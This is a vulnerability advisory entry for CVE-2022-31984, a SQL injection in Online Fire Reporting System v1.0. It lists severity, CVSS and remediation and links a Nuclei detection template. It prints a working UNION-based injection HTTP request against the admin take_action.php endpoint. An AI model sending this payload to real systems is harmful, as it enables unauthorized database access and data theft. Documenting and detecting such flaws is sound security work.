🔙 목록으로 돌아가기

CVE-2022-31984: Online Fire Reporting System v1.0 - SQL injection

TitleOnline Fire Reporting System v1.0 - SQL injection
Authortheamanrawat
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database.
RemediationTo remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
CVSS Score7.2
EPSS Score0.23519
CVE IDCVE-2022-31984
CWE IDCWE-89
Tags cve2022 cve sqli online-fire-reporting online_fire_reporting_system_project vkev vuln

🔍 Vulnerability Description

Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.

🌐 HTTP Request

GET /admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('8391'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31984.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-31984.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A